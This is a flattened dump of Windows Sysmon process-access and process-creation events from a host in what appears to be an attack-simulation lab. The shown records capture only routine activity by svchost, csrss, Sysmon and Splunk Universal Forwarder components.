13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.650{59A5CD1D-93D9-6005-DF04-00000000A301}51043416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:45.525{59A5CD1D-93D9-6005-DF04-00000000A301}5104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 